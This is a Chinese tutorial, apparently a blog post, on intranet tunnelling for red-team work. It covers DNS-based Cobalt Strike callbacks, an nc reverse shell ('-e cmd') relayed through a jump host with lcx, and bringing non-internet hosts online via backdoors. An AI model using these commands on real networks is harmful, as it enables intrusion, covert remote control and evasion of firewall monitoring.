内网安全-流量隧道(一)不出网CS上线正反向端口转发
隧道技术概述:
在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截
CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
OSI七层模型
正反向连接
正向:攻击机主动连接目标
反向:目标主动来连接攻击机
常用的隧道技术有以下三种:
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
协议出网探测:
1. TCP 协议
用“瑞士军刀”——netcat
执行 nc 命令:nc <IP> <端口>
2. HTTP 协议
用“curl”工具,执行curl <IP地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的话,就会输出相应的端口信息
3. ICMP 协议
用“ping”命令,执行ping <IP地址/域名>
4. DNS 协议
检测DNS连通性常用的命令是“nslookup”和“dig”
nslookup 是windows自带的DNS探测命令
dig是linux系统自带的DNS探测命令
5、其他协议或端口直接测
单协议出网-探针并上线CS(dns):
环境/场景:防火墙设置只出网DNS。
利用:CS配置上线监听器DNS
云主机安全组配置端口53启用;
买一个域名修改解析记录如下:
A记录->cs主机名->CS服务器IP
NS记录->ns1主机名->上个A记录地址
NS记录->ns2主机名->上个A记录地址
3.配置DNS监听器内容如下:
ns1.xxxx.com
ns2.xxxx.com
cs.xxxx.com
4.生成后门执行上线后启用命令:
check in
mode dns-txt
shell whoami
完全不出网-探针并上线CS(正反向/重定向转发)
场景:
利用条件:上线或反弹均需要一台能出网的跳板机
1、反弹shell:
win10受害机:nc 192.168.3.104 1111 -e cmd //反向连接
将cmd权限流量转发至192.168.3.104 1111端口上
win7跳板机:lcx -listen 1111 2222 //转发
将本地的1111流量转发至2222端口上
本机:nc 192.168.46.142 2222 //正向连接
直接连接192.168.46.142上2222数据
2、上线CS:
1、跳板机先上线
2、在跳板机上创建监听
3、将创建的监听生成后门
4、不出网机器执行后门上线
思维导图补充:内网-信息收集&不出网上线CS&正反向&端口转发 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。https://www.zhixi.com/view/bd6fcf39
内网安全-流量隧道(一)不出网CS上线正反向端口转发相关推荐
- 内网安全:隧道技术详解
目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后 ...
- 3分钟详解服务器入网带宽出网带宽和入流量出流量
云服务器带宽入网带宽和出网带宽是指哪个方向?如何区分云服务器的出网带宽和入网带宽?什么服务器的入流量和出流量?服务器测速网来详细说下云服务器带宽方向.流量方向及收费或免费详细说明: 腾讯云服务器出网带 ...
- 【K8S学习笔记】Part1:使用端口转发访问集群内的应用
本文介绍如何使用kubectl port-forward命令连接K8S集群中运行的Redis服务.这种连接方式有助于数据库的调试工作. 注意:本文针对K8S的版本号为v1.9,其他版本可能会有少许不同 ...
- 内网渗透-端口转发隧道技术
文章目录 代理和隧道技术区别 隧道通信原理 常用的隧道技术 判断内网协议连通性 ICMP协议 TCP协议 telnet NC HTTP协议 curl Wget DNS协议 nslookup dig I ...
- 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)
文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...
- 【内网安全】隧道技术SSHDNSICMPSMB上线通讯LinuxMac
文章目录 SMB隧道&通讯&上线 ICMP隧道&通讯&上线 DNS隧道&通讯&上线 1.上线环境:内网主机只出网DNS协议数据,解决上线 2.通讯环境: ...
- 腾讯云服务器带宽计费模式按流量内网、外网出入流量计算说明
腾讯云服务器公网带宽计费模式按使用流量计费,云服务器对内或对外产生的流量如何计算?云服务器出方向(下行流量)和入方向(上行流量)怎么计算?腾讯云百科来详细说下腾讯云服务器按使用流量计算说明: 腾讯云服 ...
- 隧道技术之不出网-正向代理
简介 很多情况下,拿下一台主机不出网,就没办法反向连接,需要去正向连接,这里用到一个工具正向代理工具Neo-reGeorg 用法 第一步需要先设置一个密码,假设我设置的为123 python neor ...
- 内网渗透-SSH隧道
内网渗透之--ssh隧道 网络拓扑图: ssh 正向链接: 在web服务器执行:ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 (在web服务 ...
最新文章
- 读书笔记--C陷阱与缺陷(三)
- zabbix加入TCP连接数及状态的监控
- 普渡大学计算机硕士申请条件,普渡大学CS硕士申请需要哪些条件?未来的就业前景全面解析...
- 基于socket通信实现Ftp连接
- JavaScript基础函数的配置对象Configuration Objects(020)
- 最大熵模的理解与最大熵模型逻辑回归相似转换条件
- 数据化、信息化、数字化和智能化之间联系和区别解析(建设收藏)
- 代写python代码一般多少钱_代写代码一般多少钱(专业解读)
- 设置font标签居中显示
- 从TiDB上线阿里云的背后,如何看待云数据库的变革趋势
- 电脑系统声音常见故障问题解决方法汇总
- 名悦集团:什么是驾驶证终身免检,要满足什么条件
- STM32——C语言基础
- iOS创建pch文件
- Semantic Proximity Search on Heterogeneous Graph by Proximity Embedding
- iOS 磁场传感器的应用 Swift CoreMotion使用
- react 组件渲染控制
- 大数据中心系统集成资质
- 再现“换桥奇迹”|人大金仓助力大型运营商完成营销系统国产化升级
- NetAlly网络测试仪